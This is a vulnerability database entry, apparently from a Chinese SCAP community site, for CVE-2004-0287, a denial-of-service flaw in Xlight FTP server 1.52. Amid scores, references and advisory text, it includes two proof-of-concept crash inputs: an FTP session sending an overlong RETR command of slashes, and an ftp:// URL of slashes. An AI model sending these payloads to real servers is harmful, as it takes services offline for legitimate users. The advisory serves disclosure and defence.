CVE-2004-0287
CVSS5.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:43:11
NMCOES    

[原文]Xlight FTP server 1.52 allows remote authenticated users to cause a denial of service (crash) via a RETR command with a long argument containing a large number of / (slash) characters, possibly triggering a buffer overflow.


[CNNVD]XLight FTP Server远程拒绝服务漏洞(CNNVD-200411-122)

        Xlight FTP server 1.52存在漏洞。远程认证用户可以借助一个带有包含大量/(斜杠)字符的超大RETR命令导致服务拒绝(崩溃),也可能触发一个缓冲区溢出漏洞。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0287
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0287
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-122
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107695172917263&w=2
(UNKNOWN)  BUGTRAQ  20040215 Xlight ftp server 1.52 RETR bug
http://www.securityfocus.com/bid/9668
(UNKNOWN)  BID  9668
http://xforce.iss.net/xforce/xfdb/15220
(VENDOR_ADVISORY)  XF  xlight-retr-dos(15220)

- 漏洞信息

XLight FTP Server远程拒绝服务漏洞
中危 缓冲区溢出
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        Xlight FTP server 1.52存在漏洞。远程认证用户可以借助一个带有包含大量/(斜杠)字符的超大RETR命令导致服务拒绝(崩溃),也可能触发一个缓冲区溢出漏洞。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23701)

XLight FTP Server 1.52 Remote Send File Request Denial Of Service Vulnerability (EDBID:23701)
windows dos
2004-02-16 Verified
0 intuit e.b.
N/A [点击下载]
source: http://www.securityfocus.com/bid/9668/info

A remote denial of service vulnerability has been reported to exist in the Send File Request functionality of the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.

Upon successful exploitation an attacker may be able to cause the affected server to crash, denying service to legitimate users.

ftp> open
To www.example.com
Connected to www.example.com.
220 Xlight Server 1.52 ready...
User (www.example.com:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.		

- 漏洞信息

6722
Xlight FTP Server RETR Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2004-02-15 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

XLight FTP Server Remote Denial Of Service Vulnerability
Boundary Condition Error 9627
Yes No
2004-02-10 12:00:00 2009-07-12 02:06:00
Discovery of this issue has been credited to "intuit e.b." <intuit@linuxmail.org>.

- 受影响的程序版本

XLight FTP Server XLight FTP Server 1.52

- 漏洞讨论

A remote denial of service vulnerability has been reported to exist in the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.

- 漏洞利用

Currently we are not aware of any exploits for this issue. The following proof of concept, which forces the server process to crash, has been provided. Submitting 260 or more bytes to the affected process will cause the server to crash:

-----------------------------------------------------------------------
ftp://user@127.0.0.1////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
/////////////////////
-----------------------------------------------------------------------

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站